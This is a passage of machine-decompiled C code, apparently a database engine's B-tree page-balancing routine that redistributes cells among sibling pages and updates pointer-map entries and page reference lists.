								_t1175 = ((( *(_t1115 + _t1230) & 0x000000ff) << 0x00000008 |  *(_t1115 + _t1230 + 1) & 0x000000ff) << 0x00000008 | _t1116[2] & 0x000000ff) << 0x00000008 | _t1116[3] & 0x000000ff;
								_t1231 = _t1186 * 4;
								_v124 = _t1175;
								 *(_t1233 + _t1231 - 0x98) = _t1116;
								_v132 = _t1175;
								_t997 = E00FA0C27(_v68, _t1116);
								_t1176 = _v68;
								 *(_t1233 + _t1231 - 0x18) = _t997 & 0x0000ffff;
								__eflags = _v56 - ( *(_v68 + 1) & 0x000000ff) + _t1186;
								E00FA53D7(_v68, _v56 - ( *(_v68 + 1) & 0x000000ff) + _t1186, _t997 & 0x0000ffff);
								_t1239 = _t1235 + 0x14;
							} else {
								__eflags = _v56 + _t1186 - ( *(_t1229 + 0x18) & 0x0000ffff);
								if(_v56 + _t1186 != ( *(_t1229 + 0x18) & 0x0000ffff)) {
									goto L17;
								} else {
									_t1121 =  *(_t1229 + 0x14);
									_t1176 = ((( *_t1121 & 0x000000ff) << 0x00000008 | _t1121[1] & 0x000000ff) << 0x00000008 | _t1121[2] & 0x000000ff) << 0x00000008 | _t1121[3] & 0x000000ff;
									_t1231 = _t1186 * 4;
									_v124 = _t1176;
									 *(_t1233 + _t1231 - 0x98) = _t1121;
									_v132 = _t1176;
									 *(_t1233 + _t1231 - 0x18) = E00FA0C27(_v68, _t1121) & 0x0000ffff;
									_t1239 = _t1235 + 8;
									 *(_v68 + 1) = 0;
								}
							}
							_t1202 = _t1231 +  &_v148;
							_t1131 = E00FA8CB7(_t1176, _v84, _v124, _t1202);
							_t1235 = _t1239 + 0xc;
							_v52 = _t1131;
							__eflags = _t1131;
							if(_t1131 == 0) {
								continue;
							} else {
								goto L19;
							}
							goto L21;
						}
						_t1202 = _v84;
						_t1131 =  *(_t1202 + 0x14) & 0x0000ffff;
						_t1018 = _t1013 + 0x00000003 & 0xfffffffc;
						_v116 = ( *(_t1202 + 0x14) & 0x0000ffff) + 0x50;
						_t821 = E00FCF987((( *(_t1202 + 0x14) & 0x0000ffff) + 0x50) * _v72 + ( *(_t1202 + 0x14) & 0x0000ffff) + (_t1018 + _t1018 * 2) * 2);
						_t1236 = _t1235 + 4;
						_v96 = _t821;
						__eflags = _t821;
						if(_t821 != 0) {
							_t1065 = _v148;
							_t822 = _t821 + _t1018 * 4;
							_v92 = _t822;
							_t1131 = _t822 + _t1018 * 2;
							_v120 = ( *(_t1065 + 3) & 0x000000ff) << 0x00000002 & 0x0000ffff;
							_v104 =  *(_t1065 + 4) & 0x000000ff;
							_t1186 = 0;
							_v64 = _t1131;
							_v80 = 0;
							__eflags = _v72;
							if(_v72 > 0) {
								_t1095 = 0;
								__eflags = 0;
								_v100 = 0;
								do {
									_t1037 = ( *(_t1202 + 0x14) & 0x0000ffff) + _t1095 + _t1131;
									 *(_t1233 + _t1186 * 4 - 0xa4) = _t1037;
									_t966 = memcpy(_t1037,  *(_t1233 + _t1186 * 4 - 0x90), 0x13 << 2);
									 *((intOrPtr*)(_t1037 + 0x40)) = _t1037 + 0x4c;
									E00FE7337(_t1037 + 0x4c,  *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x90) + 0x40)),  *(_t966 + 0x14) & 0x0000ffff);
									_t1100 = ( *(_t1037 + 0x10) & 0x0000ffff) + ( *(_t1037 + 1) & 0x000000ff);
									_t1236 = _t1236 + 0x18;
									_t1198 = 0;
									_v108 = _t1100;
									__eflags = _t1100;
									if(_t1100 <= 0) {
										_t1218 = _v92;
										_t1101 = _v76;
									} else {
										do {
											_t1106 = ( *(_t1037 + 1) & 0x000000ff) - 1;
											__eflags = _t1106;
											_t1166 = _t1198;
											if(_t1106 < 0) {
												L43:
												_t1226 = ((( *(( *(_t1037 + 0xc) & 0x0000ffff) +  *((intOrPtr*)(_t1037 + 0x40)) + _t1166 * 2) & 0x000000ff) << 0x00000008 |  *(( *(_t1037 + 0xc) & 0x0000ffff) +  *((intOrPtr*)(_t1037 + 0x40)) + 1 + _t1166 * 2) & 0x000000ff) &  *(_t1037 + 0x12) & 0x0000ffff) +  *((intOrPtr*)(_t1037 + 0x40));
												__eflags = _t1226;
											} else {
												_t1228 = 0x14 + _t1106 * 8 + _t1037;
												__eflags = _t1228;
												do {
													__eflags = ( *(_t1228 + 4) & 0x0000ffff) - _t1166;
													if(__eflags > 0) {
														goto L42;
													} else {
														if(__eflags == 0) {
															_t1226 =  *_t1228;
														} else {
															_t1166 = _t1166 - 1;
															__eflags = _t1166;
															goto L42;
														}
													}
													goto L44;
													L42:
													_t1228 = _t1228 - 8;
													_t1106 = _t1106 - 1;
													__eflags = _t1106;
												} while (_t1106 >= 0);
												goto L43;
											}
											L44:
											 *(_v96 + _v76 * 4) = _t1226;
											_t986 = E00FA0C27(_t1037, _t1226);
											_t1218 = _v92;
											_t1101 = _v76 + 1;
											 *((short*)(_t1218 + _t1101 * 2 - 2)) = _t986;
											_t1198 = _t1198 + 1;
											_t1236 = _t1236 + 8;
											_v76 = _t1101;
											__eflags = _t1198 - _v108;
										} while (_t1198 < _v108);
									}
									_t1199 = _v80;
									__eflags = _t1199 - _v72 - 1;
									if(_t1199 < _v72 - 1) {
										__eflags = _v104;
										if(_v104 == 0) {
											_t972 =  *(_t1233 + _t1199 * 4 - 0x18) & 0x0000ffff;
											_t1162 = _v60;
											 *(_t1218 + _t1101 * 2) = _t972;
											_t1220 = _v64 + _t1162;
											_v60 = _t1162 + _t972;
											E00FE7337(_t1220,  *((intOrPtr*)(_t1233 + _t1199 * 4 - 0x98)), _t972);
											_t1164 = _v76;
											_t1103 = _v96;
											_t1221 = _v92;
											 *((intOrPtr*)(_t1103 + _t1164 * 4)) = (_v120 & 0x0000ffff) + _t1220;
											 *((intOrPtr*)(_t1221 + _t1164 * 2)) =  *((intOrPtr*)(_t1221 + _t1164 * 2)) - _v120;
											_t1236 = _t1236 + 0xc;
											__eflags =  *((char*)(_t1037 + 3));
											if( *((char*)(_t1037 + 3)) != 0) {
												__eflags =  *((short*)(_t1221 + _t1164 * 2)) - 4;
												if( *((short*)(_t1221 + _t1164 * 2)) < 4) {
													 *((short*)(_t1221 + _t1164 * 2)) = 4;
												}
											} else {
												 *((intOrPtr*)( *((intOrPtr*)(_t1103 + _t1164 * 4)))) =  *((intOrPtr*)( *((intOrPtr*)(_t1037 + 0x40)) + 8));
											}
											_t1165 = _t1164 + 1;
											__eflags = _t1165;
											_v76 = _t1165;
										}
									}
									_t1095 = _v100 + _v116;
									_t1131 = _v64;
									_t1202 = _v84;
									_t1186 = _t1199 + 1;
									_v80 = _t1186;
									_v100 = _t1095;
									__eflags = _t1186 - _v72;
								} while (_t1186 < _v72);
							}
							_t1202 = (_v120 & 0x0000ffff) - 0xc + ( *(_t1202 + 0x16) & 0x0000ffff);
							_t830 = 0;
							_t1019 = 0;
							_t1067 = 0;
							__eflags = _v76;
							if(_v76 <= 0) {
								L63:
								 *((intOrPtr*)(_t1233 + _t1019 * 4 - 0x18)) = _t1067;
								 *(_t1233 + _t1019 * 4 - 0x2c) = _v76;
								_t1020 = _t1019 + 1;
								_v60 = _t1020;
								_t254 = _t1020 - 1; // 0x0
								_t832 = _t254;
								_t1068 = _t832;
								_v100 = _t832;
								_v80 = _t832;
								__eflags = _t1068;
								if(_t1068 > 0) {
									do {
										_t1034 =  *((intOrPtr*)(_t1233 + _t1068 * 4 - 0x1c));
										_t951 =  &_v28;
										_t1202 =  *(_t951 + _t1068 * 4);
										_v116 = _t951 + _t1068 * 4;
										_v108 = _t1233 + _t1068 * 4 - 0x1c;
										while(1) {
											_t1186 =  *((intOrPtr*)(_t1233 + _t1068 * 4 - 0x30)) - 1;
											_t1131 = _t1186 - _v104 + 1;
											__eflags = _t1202;
											if(_t1202 == 0) {
												goto L67;
											}
											L66:
											_t957 = _v92;
											_t959 = _v92;
											__eflags = ( *(_t959 + _t1131 * 2) & 0x0000ffff) + 2 + _t1202 - _t1034 - ( *(_t957 + _t1186 * 2) & 0x0000ffff) - 2;
											if(( *(_t959 + _t1131 * 2) & 0x0000ffff) + 2 + _t1202 <= _t1034 - ( *(_t957 + _t1186 * 2) & 0x0000ffff) - 2) {
												goto L67;
											}
											break;
											L67:
											_t1086 = _v92;
											_t1202 = _t1202 + ( *(_t1086 + _t1131 * 2) & 0x0000ffff) + 2;
											_t1034 = _t1034 + 0xfffffffe - ( *(_t1086 + _t1186 * 2) & 0x0000ffff);
											_t1068 = _v80;
											 *((intOrPtr*)(_t1233 + _t1068 * 4 - 0x30)) =  *((intOrPtr*)(_t1233 + _t1068 * 4 - 0x30)) - 1;
											_t1186 =  *((intOrPtr*)(_t1233 + _t1068 * 4 - 0x30)) - 1;
											_t1131 = _t1186 - _v104 + 1;
											__eflags = _t1202;
											if(_t1202 == 0) {
												goto L67;
											}
											goto L66;
										}
										 *_v116 = _t1202;
										_t1068 = _v80 - 1;
										 *_v108 = _t1034;
										_v80 = _t1068;
										__eflags = _t1068;
									} while (_t1068 > 0);
									_t1020 = _v60;
								}
								_t833 = _v148;
								__eflags =  *((intOrPtr*)(_t833 + 0x48)) - 1;
								if( *((intOrPtr*)(_t833 + 0x48)) > 1) {
									_t1186 = 0;
									_v80 =  *( *(_t833 + 0x40)) & 0x000000ff;
									__eflags = _t1020;
									if(_t1020 <= 0) {
										L82:
										_t1021 = _v72;
										__eflags = _t1186 - _t1021;
										if(_t1186 >= _t1021) {
											L125:
											_t1190 = 0;
											__eflags = _v100;
											if(_v100 > 0) {
												do {
													_t923 =  *((intOrPtr*)(_t1233 + _t1190 * 4 - 0x18));
													_t400 = _t1190 + 1; // 0x1
													_t1031 = _t400;
													_t1156 =  *((intOrPtr*)(_t923 + 0x48));
													_v108 = _t923;
													_t1215 = _t1190;
													_v116 = _t1031;
													_t1083 = _t1031;
													__eflags = _t1031 - _v60;
													if(_t1031 < _v60) {
														_t1032 = _v60;
														do {
															_t925 =  *((intOrPtr*)( *((intOrPtr*)(_t1233 + _t1083 * 4 - 0x18)) + 0x48));
															__eflags = _t925 - _t1156;
															if(_t925 < _t1156) {
																_t1215 = _t1083;
																_t1156 = _t925;
															}
															_t1083 = _t1083 + 1;
															__eflags = _t1083 - _t1032;
														} while (_t1083 < _t1032);
														_t1031 = _v116;
														__eflags = _t1215 - _t1190;
														if(_t1215 > _t1190) {
															 *((intOrPtr*)(_t1233 + _t1190 * 4 - 0x18)) =  *((intOrPtr*)(_t1233 + _t1215 * 4 - 0x18));
															 *((intOrPtr*)(_t1233 + _t1215 * 4 - 0x18)) = _v108;
														}
													}
													_t1190 = _t1031;
													__eflags = _t1190 - _v100;
												} while (_t1190 < _v100);
											}
											_t1022 = _v128;
											_t1135 =  *(_t1233 + _v88 * 4 - 0x1c);
											_t1202 = 0;
											_t1069 =  *(_t1135 + 0x48);
											 *_t1022 = _t1069 >> 0x18;
											 *((char*)(_t1022 + 1)) = _t1069 >> 0x10;
											_t1186 = 0;
											_v108 = _t1135;
											 *((char*)(_t1022 + 2)) = _t1069 >> 8;
											 *(_t1022 + 3) = _t1069;
											_v64 = 0;
											__eflags = _v88;
											if(_v88 <= 0) {
												L149:
												__eflags = _v80 & 0x00000008;
												if((_v80 & 0x00000008) == 0) {
													 *((intOrPtr*)( *((intOrPtr*)(_t1135 + 0x40)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1233 + _v72 * 4 - 0xa8)) + 0x40)) + 8));
												}
												__eflags = _a16;
												_t1131 = _v28;
												_v56 = _t1131;
												if(_a16 == 0) {
													L159:
													_t842 = _v84;
													__eflags =  *((char*)(_t842 + 0x12));
													if( *((char*)(_t842 + 0x12)) != 0) {
														_t1070 = _v168;
														_v80 = _t1070;
														_t843 =  *(_t1070 + 1) & 0x000000ff;
														_t1202 = ( *(_t1070 + 0x10) & 0x0000ffff) + _t843;
														_v112 = _t843;
														__eflags = _t843;
														if(_t843 == 0) {
															_t1186 = _t1186 | 0xffffffff;
															__eflags = _t1186;
														} else {
															_t1186 =  *(_t1070 + 0x18) & 0x0000ffff;
														}
														_t844 = 0;
														_t1023 = 0;
														_v60 = 0;
														__eflags = _v76;
														if(_v76 > 0) {
															_t1131 = _v52;
															_v100 = 0;
															while(1) {
																__eflags = _t1131;
																if(_t1131 != 0) {
																	goto L188;
																}
																__eflags = _t1023 - _t1202;
																if(_t1023 == _t1202) {
																	__eflags = _v104 - _t1131;
																	_t1131 = _t1131 & 0xffffff00 | _v104 == _t1131;
																	do {
																		_t1070 =  *(_t1233 + _t844 * 4 - 0xa0);
																		_v60 = _t844 + 1;
																		_t855 =  *(_t1070 + 1);
																		_v64 = _t855 & 0x000000ff;
																		_v80 = _t1070;
																		_t1202 = ( *(_t1070 + 0x10) & 0x0000ffff) + _t1131 + _v64 + _t1023;
																		__eflags = _t855;
																		if(_t855 != 0) {
																			_v112 = _v64;
																			_t1186 = ( *(_t1070 + 0x18) & 0x0000ffff) + _t1131 + _t1023;
																			__eflags = _t1186;
																		}
																		_t844 = _v60;
																		__eflags = _t1023 - _t1202;
																	} while (_t1023 == _t1202);
																}
																__eflags = _t1023 - _t1186;
																if(_t1023 == _t1186) {
																	_t853 = _v112 - 1;
																	_t1131 = 1;
																	_v112 = _t853;
																	__eflags = _t853;
																	if(_t853 > 0) {
																		_t1186 = _t1186 + 1;
																		__eflags = _t1186;
																	}
																}
																_t849 = _v100;
																__eflags = _t1023 -  *((intOrPtr*)(_t1233 + _t849 - 0x2c));
																if(_t1023 !=  *((intOrPtr*)(_t1233 + _t849 - 0x2c))) {
																	L176:
																	__eflags = _t1131;
																	_t1142 = _v56;
																	if(_t1131 != 0) {
																		L178:
																		__eflags = _v120;
																		if(_v120 != 0) {
																			_t1072 = _v52;
																		} else {
																			_t873 = E00FB16F7(_v84, ((( *(_v96 + _t1023 * 4))[1] & 0x000000ff | ( *( *(_v96 + _t1023 * 4)) & 0x000000ff) << 0x00000008) << 0x00000008 | ( *(_v96 + _t1023 * 4))[2] & 0x000000ff) << 0x00000008 | ( *(_v96 + _t1023 * 4))[3] & 0x000000ff, 5,  *((intOrPtr*)(_v56 + 0x48)));
																			_t1142 = _v56;
																			_t1072 = _t873;
																			_t1236 = _t1236 + 0x10;
																			_v52 = _t1072;
																		}
																		_t850 = _v92;
																		__eflags =  *((intOrPtr*)(_t850 + _t1023 * 2)) -  *((intOrPtr*)(_t1142 + 0xa));
																		if( *((intOrPtr*)(_t850 + _t1023 * 2)) <=  *((intOrPtr*)(_t1142 + 0xa))) {
																			goto L186;
																		} else {
																			__eflags = _t1072;
																			if(_t1072 != 0) {
																				goto L186;
																			} else {
																				_v136 =  *(_v96 + _t1023 * 4);
																				E00FBBD27(_t1142,  *(_v96 + _t1023 * 4),  &_v200);
																				_t860 = _v172;
																				_t1236 = _t1236 + 0xc;
																				__eflags = _t860;
																				if(_t860 == 0) {
																					_t1131 = 0;
																					_v52 = 0;
																				} else {
																					_t1131 = E00FB16F7( *((intOrPtr*)(_v56 + 0x3c)), ((( &(_v136[_t860 & 0x0000ffff]))[1] & 0x000000ff | (_v136[_t860 & 0x0000ffff] & 0x000000ff) << 0x00000008) << 0x00000008 | ( &(_v136[_t860 & 0x0000ffff]))[2] & 0x000000ff) << 0x00000008 | ( &(_v136[_t860 & 0x0000ffff]))[3] & 0x000000ff, 3,  *((intOrPtr*)(_v56 + 0x48)));
																					_t1236 = _t1236 + 0x10;
																					_v52 = _t1131;
																				}
																			}
																		}
																	} else {
																		__eflags =  *((intOrPtr*)(_t1070 + 0x48)) -  *((intOrPtr*)(_t1142 + 0x48));
																		if( *((intOrPtr*)(_t1070 + 0x48)) ==  *((intOrPtr*)(_t1142 + 0x48))) {
																			goto L186;
																		} else {
																			goto L178;
																		}
																	}
																} else {
																	_t875 = _t849 + 4;
																	__eflags = _v104;
																	_v100 = _t875;
																	_v56 =  *((intOrPtr*)(_t1233 + _t875 - 0x18));
																	if(_v104 == 0) {
																		L186:
																		_t1131 = _v52;
																	} else {
																		goto L176;
																	}
																}
																_t1070 = _v80;
																_t844 = _v60;
																_t1023 = _t1023 + 1;
																__eflags = _t1023 - _v76;
																if(_t1023 < _v76) {
																	continue;
																}
																goto L188;
															}
														}
														L188:
														__eflags = _v120;
														if(_v120 == 0) {
															_t1186 = 0;
															__eflags = _v52;
															if(_v52 == 0) {
																while(1) {
																	__eflags = _t1186 - _v88;
																	if(_t1186 >= _v88) {
																		goto L21;
																	}
																	_t1131 = ((( *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 8) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 9) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 0xa) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 0xb) & 0x000000ff;
																	_t1202 = E00FB16F7(_v84, ((( *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 8) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 9) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 0xa) & 0x000000ff) << 0x00000008 |  *( *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x40)) + 0xb) & 0x000000ff, 5,  *((intOrPtr*)( *(_t1233 + _t1186 * 4 - 0x18) + 0x48)));
																	_t1236 = _t1236 + 0x10;
																	_t1186 = _t1186 + 1;
																	_v52 = _t1202;
																	__eflags = _t1202;
																	if(_t1202 == 0) {
																		continue;
																	} else {
																		goto L21;
																	}
																	goto L298;
																}
															}
														}
													}
													goto L21;
												} else {
													_t1077 = _v68;
													__eflags =  *((short*)(_t1077 + 0x10));
													if( *((short*)(_t1077 + 0x10)) != 0) {
														goto L159;
													} else {
														__eflags = ( *(_t1077 + 5) & 0x000000ff) -  *((intOrPtr*)(_t1131 + 0xe));
														if(( *(_t1077 + 5) & 0x000000ff) >  *((intOrPtr*)(_t1131 + 0xe))) {
															goto L159;
														} else {
															_t878 =  *((intOrPtr*)(_t1131 + 0x3c));
															_t1131 =  *(_t1131 + 0x40);
															_v64 = _t878;
															__eflags =  *((intOrPtr*)(_t1077 + 0x48)) - 1;
															_t1186 =  ==  ? 0x64 : 0;
															_v52 = 0;
															E00FE7337((( *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 5) & 0x000000ff) << 0x00000008 |  *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 6) & 0x000000ff) +  *((intOrPtr*)(_t1077 + 0x40)), (( *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 5) & 0x000000ff) << 0x00000008 |  *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 6) & 0x000000ff) + _t1131, ( *(_v64 + 0x16) & 0x0000ffff) - (( *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 5) & 0x000000ff) << 0x00000008 |  *(( *(_v28 + 5) & 0x000000ff) + _t1131 + 6) & 0x000000ff));
															_t1081 =  *(_v28 + 0x10) & 0x0000ffff;
															E00FE7337(( ==  ? 0x64 : 0) +  *((intOrPtr*)(_t1077 + 0x40)), ( *(_v28 + 5) & 0x000000ff) + _t1131, ( *(_v28 + 0xc) & 0x0000ffff) + ( *(_v28 + 0x10) & 0x0000ffff) * 2);
															_t1025 = _v68;
															 *_t1025 = 0;
															E00FBA397(_t1131, _t1025);
															_t1236 = _t1236 + 0x1c;
															__eflags =  *((char*)(_v64 + 0x12));
															if(__eflags == 0) {
																_t1202 = 0;
																__eflags = 0;
															} else {
																_push(_t1025);
																_t1202 = E00FB5CC7(_t1081, _t1131, __eflags);
																_t1236 = _t1236 + 4;
																_v52 = _t1202;
															}
															__eflags = _t1202;
															if(_t1202 == 0) {
																_v52 = E00FA7C87( *((intOrPtr*)(_v28 + 0x3c)), _v28,  *((intOrPtr*)(_v28 + 0x48)));
																L20:
																_t1236 = _t1235 + 0xc;
															}
															goto L21;
														}
													}
												}
											} else {
												do {
													_v116 =  *((intOrPtr*)(_t1233 + _t1202 * 4 - 0x18));
													E00FE7127(_t1069,  *((intOrPtr*)(_t1233 + _t1202 * 4 - 0x18)), _v80);
													_t1212 =  *(_t1233 + _t1202 * 4 - 0x2c);
													E00F9DB57( *((intOrPtr*)(_t1233 + _t1202 * 4 - 0x18)), _t1212 - _t1186, _v96 + _t1186 * 4, _v92 + _t1186 * 2);
													_t1186 = _t1212;
													_t1236 = _t1236 + 0x18;
													__eflags = _t1186 - _v76;
													if(_t1186 >= _v76) {
														goto L147;
													} else {
														_t1214 =  *((intOrPtr*)(_v96 + _t1186 * 4));
														_t1069 =  *(_v92 + _t1186 * 2) & 0x0000ffff;
														_t913 =  &(_v136[_v112]);
														_t1028 = _v116;
														_t1131 = (_v120 & 0x0000ffff) + _t1069;
														__eflags =  *((char*)(_t1028 + 3));
														_v60 =  &(_v136[_v112]);
														if( *((char*)(_t1028 + 3)) != 0) {
															__eflags = _v104;
															if(_v104 == 0) {
																_t1214 = _t1214 - 4;
																__eflags = _t1069 - 4;
																if(_t1069 == 4) {
																	_t915 = E00FA0C27(_v68, _t1214);
																	_t1236 = _t1236 + 8;
																	_t1131 = _t915 & 0x0000ffff;
																	goto L144;
																}
															} else {
																_t1186 = _t1186 - 1;
																E00FBBD27(_t1028,  *((intOrPtr*)(_v96 + _t1186 * 4)),  &_v200);
																_t1214 = _v60;
																_t921 = E00FCDC27(_t1186, _v60 + 4, _v192, _v188);
																_t1236 = _t1236 + 0x18;
																_t471 = _t921 + 4; // 0x4
																_t1131 = _t471;
																_t913 = 0;
															}
														} else {
															_t1069 =  *(_t1028 + 0x40);
															 *((intOrPtr*)( *(_t1028 + 0x40) + 8)) =  *_t1214;
															L144:
															_t913 = _v60;
														}
														_t1029 = _v56;
														_v112 = _v112 + _t1131;
														_t1202 = E00FA9CF7(_v68, _t1029, _t1214, _t1131, _t913,  *((intOrPtr*)(_t1028 + 0x48)));
														_t1236 = _t1236 + 0x18;
														_v52 = _t1202;
														__eflags = _t1202;
														if(_t1202 != 0) {
															goto L21;
														} else {
															_t1186 = _t1186 + 1;
															_t1030 = _t1029 + 1;
															__eflags = _t1030;
															_v56 = _t1030;
															goto L147;
														}
													}
													goto L298;
													L147:
													_t1202 = _v64 + 1;
													_v64 = _t1202;
													__eflags = _t1202 - _v88;
												} while (_t1202 < _v88);
												_t1135 = _v108;
												goto L149;
											}
										} else {
											while(1) {
												_t1202 =  *(_t1233 + _t1186 * 4 - 0x90);
												_t928 = E00FA7C87( *(_t1202 + 0x3c), _t1202,  *(_t1202 + 0x48));
												_t1236 = _t1236 + 0xc;
												_v52 = _t928;
												__eflags = _t928;
												if(_t928 != 0) {
													goto L21;
												}
												__eflags = _t1202;
												if(_t1202 != 0) {
													_t1084 =  *(_t1202 + 0x44);
													__eflags = _t1084;
													if(_t1084 != 0) {
														_t344 = _t1084 + 0x16;
														 *_t344 =  *(_t1084 + 0x16) - 1;
														__eflags =  *_t344;
														_t346 = _t1084 + 0x10; // 0xa74c085
														_t1216 =  *_t346;
														if( *_t344 == 0) {
															_t347 = _t1084 + 0x18; // 0x83004818
															 *((intOrPtr*)( *_t347 + 0xc)) =  *((intOrPtr*)( *_t347 + 0xc)) - 1;
															__eflags =  *(_t1084 + 0x14) & 0x00000002;
															if(( *(_t1084 + 0x14) & 0x00000002) != 0) {
																_t358 = _t1084 + 0x18; // 0x83004818
																_t1033 =  *_t358;
																__eflags =  *(_t1033 + 8) - _t1084;
																if( *(_t1033 + 8) == _t1084) {
																	_t360 = _t1084 + 0x20; // 0x3078e8e4
																	_t940 =  *_t360;
																	__eflags = _t940;
																	if(_t940 != 0) {
																		while(1) {
																			__eflags =  *(_t940 + 0x14) & 0x00000004;
																			if(( *(_t940 + 0x14) & 0x00000004) == 0) {
																				goto L98;
																			}
																			_t940 =  *(_t940 + 0x20);
																			__eflags = _t940;
																			if(_t940 != 0) {
																				continue;
																			}
																			goto L98;
																		}
																	}
																	L98:
																	 *(_t1033 + 8) = _t940;
																}
																_t366 = _t1084 + 0x1c; // 0x75ff04c4
																_t1157 =  *_t366;
																_t367 = _t1084 + 0x20; // 0x3078e8e4
																_t937 =  *_t367;
																__eflags = _t1157;
																if(_t1157 == 0) {
																	 *((intOrPtr*)(_t1033 + 4)) = _t937;
																} else {
																	 *((intOrPtr*)(_t1157 + 0x20)) = _t937;
																}
																_t370 = _t1084 + 0x20; // 0x3078e8e4
																_t1158 =  *_t370;
																_t371 = _t1084 + 0x1c; // 0x75ff04c4
																_t938 =  *_t371;
																__eflags = _t1158;
																if(_t1158 == 0) {
																	 *_t1033 = _t938;
																} else {
																	 *((intOrPtr*)(_t1158 + 0x1c)) = _t938;
																}
																_t373 = _t1084 + 0x18; // 0x83004818
																_t939 =  *_t373;
																 *(_t1084 + 0x1c) = 0;
																 *(_t1084 + 0x20) = 0;
																_t1131 =  *_t939;
																 *(_t1084 + 0x1c) = _t1131;
																__eflags = _t1131;
																if(_t1131 != 0) {
																	 *(_t1131 + 0x20) = _t1084;
																}
																__eflags = _t939[1];
																 *_t939 = _t1084;
																if(_t939[1] == 0) {
																	_t939[1] = _t1084;
																}
																__eflags = _t939[2];
																_t1021 = _v72;
																if(_t939[2] == 0) {
																	__eflags =  *(_t1084 + 0x14) & 0x00000004;
																	if(( *(_t1084 + 0x14) & 0x00000004) == 0) {
																		_t939[2] = _t1084;
																	}
																}
															} else {
																_t353 = _t1084 + 0x18; // 0x83004818
																_t941 =  *_t353;
																__eflags =  *(_t941 + 0x1c);
																if( *(_t941 + 0x1c) != 0) {
																	__eflags =  *((intOrPtr*)(_t1084 + 0xc)) - 1;
																	if( *((intOrPtr*)(_t1084 + 0xc)) == 1) {
																		 *(_t941 + 0x2c) = 0;
																	}
																	 *0x481880( *((intOrPtr*)(_t941 + 0x28)), _t1084, 0);
																	_t1236 = _t1236 + 0xc;
																}
															}
														}
														_t929 =  *((intOrPtr*)(_t1216 + 0xa8));
														__eflags =  *(_t929 + 0xc);
														if( *(_t929 + 0xc) == 0) {
															__eflags =  *((char*)(_t1216 + 4));
															if( *((char*)(_t1216 + 4)) == 0) {
																L117:
																__eflags =  *(_t1216 + 0x24);
																if( *(_t1216 + 0x24) == 0) {
																	__eflags =  *((char*)(_t1216 + 0xe)) - 2;
																	if( *((char*)(_t1216 + 0xe)) >= 2) {
																		_t931 =  *0x48706c;
																		__eflags = _t931;
																		if(_t931 != 0) {
																			 *_t931();
																		}
																		E00FCB047(_t1021, _t1186, _t1216);
																		_t933 =  *0x487070;
																		_t1236 = _t1236 + 4;
																		__eflags = _t933;
																		if(_t933 != 0) {
																			 *_t933();
																		}
																	}
																}
																E00FAFBD7(_t1186, _t1216);
																_t1236 = _t1236 + 4;
															} else {
																__eflags =  *(_t1216 + 0x4c);
																if(__eflags >= 0) {
																	if(__eflags > 0) {
																		goto L117;
																	} else {
																		__eflags =  *(_t1216 + 0x48);
																		if( *(_t1216 + 0x48) > 0) {
																			goto L117;
																		}
																	}
																}
															}
														}
													}
												}
												 *(_t1233 + _t1186 * 4 - 0x90) = 0;
												_t1186 = _t1186 + 1;
												__eflags = _t1186 - _t1021;
												if(_t1186 < _t1021) {
													continue;
												} else {
													goto L125;
												}
												goto L298;
											}
											goto L21;
										}
									} else {
										do {
											__eflags = _t1186 - _v72;
											if(_t1186 >= _v72) {
												_t1202 = E00F9B2E7(_v84,  &_v64,  &_v132, _v124, 0);
												_t1236 = _t1236 + 0x14;
												_v52 = _t1202;
												__eflags = _t1202;
												if(_t1202 != 0) {
													goto L21;
												} else {
													_t1131 = _v84;
													_t946 = _v64;
													_v88 = _v88 + 1;
													__eflags =  *((char*)(_t1131 + 0x12));
													 *(_t1233 + _t1186 * 4 - 0x18) = _v64;
													if( *((char*)(_t1131 + 0x12)) == 0) {
														L80:
														_v124 = _v132;
														goto L81;
													} else {
														_t1202 = E00FB16F7(_t1131,  *((intOrPtr*)(_t946 + 0x48)), 5,  *((intOrPtr*)(_v68 + 0x48)));
														_t1236 = _t1236 + 0x10;
														_v52 = _t1202;
														__eflags = _t1202;
														if(_t1202 != 0) {
															goto L21;
														} else {
															goto L80;
														}
													}
												}
											} else {
												_t948 =  *(_t1233 + _t1186 * 4 - 0x90);
												 *(_t1233 + _t1186 * 4 - 0x18) = _t948;
												_v64 = _t948;
												 *(_t1233 + _t1186 * 4 - 0x90) = 0;
												_t949 = E00FCB277(_t1186,  *((intOrPtr*)(_t948 + 0x44)));
												_v88 = _v88 + 1;
												_t1202 = _t949;
												_t1236 = _t1236 + 4;
												_v52 = _t1202;
												__eflags = _t1202;
												if(_t1202 != 0) {
													goto L21;
												} else {
													goto L81;
												}
											}
											goto L298;
											L81:
											_t1186 = _t1186 + 1;
											__eflags = _t1186 - _t1020;
										} while (_t1186 < _t1020);
										goto L82;
									}
								} else {
									goto L71;
								}
							} else {
								_t1186 = _v92;
								do {
									_t1131 =  *(_t1186 + _t830 * 2) & 0x0000ffff;
									_t1067 = _t1067 + 2 + _t1131;
									__eflags = _t1067 - _t1202;
									if(_t1067 <= _t1202) {
										goto L62;
									} else {
										__eflags = _v104;
										 *((intOrPtr*)(_t1233 + _t1019 * 4 - 0x18)) = _t1067 - _t1131;
										 *(_t1233 + _t1019 * 4 - 0x2c) = _t830;
										if(_v104 != 0) {
											_t830 = _t830 - 1;
											__eflags = _t830;
										}
										_t1019 = _t1019 + 1;
										_t1067 = 0;
										__eflags = _t1019 - 4;
